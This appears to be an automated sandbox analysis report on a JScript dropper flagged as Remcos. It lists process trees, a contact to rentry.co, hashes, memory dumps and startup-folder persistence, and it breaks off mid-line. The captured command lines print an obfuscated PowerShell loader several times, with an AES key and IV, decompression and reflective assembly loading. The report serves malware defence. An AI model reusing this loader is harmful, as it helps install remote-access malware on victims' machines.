Analysis Overview
SHA256
5ede5ee989e327b0562583e3f7563d691b5c1a6ade7804d4c871df84633b5845
Threat Level: Known bad
The file 03042024_2143_Install.js was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-03 13:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-03 13:43
Reported
2024-04-03 13:46
Platform
win7-20240221-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\03042024_2143_Install.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.21.95.148:443 | rentry.co | tcp |
Files
memory/2744-5-0x000000001B340000-0x000000001B622000-memory.dmp
memory/2744-6-0x00000000024E0000-0x00000000024E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tempScript.ps1
| MD5 | 1449878eb9e0b72365906e10545b3a63 |
| SHA1 | 27c596b59b6ff8024ba1e47a74a2d11a018315aa |
| SHA256 | dcbee82699901eebd224bf5d350ecd713c947da38e7d4a1dc2be04744dd035c9 |
| SHA512 | ed78aa6441f6f5ea160257b19ed1515eb29bc6a05d6bfe887f8776f101028e5cc629387f51223a69876f459fe6af6b472ac595556e952e802746fc0bce329fad |
memory/2744-8-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2744-9-0x0000000001FC0000-0x0000000002040000-memory.dmp
memory/2744-11-0x0000000001FC0000-0x0000000002040000-memory.dmp
memory/2744-10-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2744-12-0x0000000001FC0000-0x0000000002040000-memory.dmp
memory/2744-14-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a3e096d826767224c5de102c76cda71e |
| SHA1 | 700969c1d380376431e16d8d682ea10bba5a25a4 |
| SHA256 | 9a819572ec656a2f3b2824db8baf08f019296b841b6c6c7b097bd59f430544f0 |
| SHA512 | 32bdb6b7b00d542c569a291013e924a4d45953f61f8db675428a890ad6c7ba5b8be9aab1adf2a36e73d732951e5071e0bf4b79613f3c04c93ff58135460caf4c |
memory/2524-21-0x000000001B190000-0x000000001B472000-memory.dmp
memory/2524-24-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-23-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/2524-22-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
memory/2524-25-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/2524-26-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-27-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-28-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-30-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2440-38-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2440-39-0x00000000028C0000-0x0000000002940000-memory.dmp
memory/2440-40-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2440-41-0x00000000028C0000-0x0000000002940000-memory.dmp
memory/2440-42-0x00000000028C0000-0x0000000002940000-memory.dmp
memory/2440-44-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/340-52-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/340-53-0x00000000028A0000-0x0000000002920000-memory.dmp
memory/340-54-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/340-55-0x00000000028A0000-0x0000000002920000-memory.dmp
memory/340-56-0x00000000028A0000-0x0000000002920000-memory.dmp
memory/340-58-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1032-65-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1032-66-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-67-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1032-68-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-69-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-71-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-72-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1768-79-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1768-80-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/1768-82-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1768-83-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/1768-84-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/1768-85-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/992-93-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/992-94-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-96-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/992-97-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-98-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-99-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-100-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1556-107-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1556-108-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-109-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1556-110-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-111-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-112-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-114-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/2088-122-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2088-123-0x0000000002800000-0x0000000002880000-memory.dmp
memory/2088-124-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2088-125-0x0000000002800000-0x0000000002880000-memory.dmp
memory/2088-126-0x0000000002800000-0x0000000002880000-memory.dmp
memory/2088-128-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1616-135-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1616-136-0x00000000024F0000-0x0000000002570000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-03 13:43
Reported
2024-04-03 13:46
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Remcos
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\03042024_2143_Install.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object 